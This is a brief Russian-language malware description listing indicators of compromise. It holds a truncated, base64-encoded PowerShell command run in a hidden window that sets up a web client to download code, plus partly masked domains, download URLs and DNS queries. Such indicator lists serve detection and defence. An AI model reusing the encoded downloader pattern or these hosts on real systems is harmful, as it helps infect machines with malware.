Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADYANgA5AF8ANgBfADIAPQAoACcAcwA2ADUAXwBfAF8AXwAnACsAJwAyACcAKQA7ACQAaAA3ADYAOQA0ADIAXwA2AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAOABfADUANQAyADkANAA9AC...
- 'va##kad.sk':80
- 'va##kad.sk':443
- 'vi#####erm.dspharma.ca':80
- 'tv###dirim.com':80
- http://va##kad.sk/access/65rf/
- http://tv###dirim.com/sendincverif/dw/
- 'va##kad.sk':443
- DNS ASK me###ggroup.com
- DNS ASK va##kad.sk
- DNS ASK vi#####erm.dspharma.ca
- DNS ASK uc##k.com
- DNS ASK tv###dirim.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADYANgA5AF8ANgBfADIAPQAoACcAcwA2ADUAXwBfAF8AXwAnACsAJwAyACcAKQA7ACQAaAA3ADYAOQA0ADIAXwA2AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAOABfADUANQAyADkANAA9AC...' (со скрытым окном)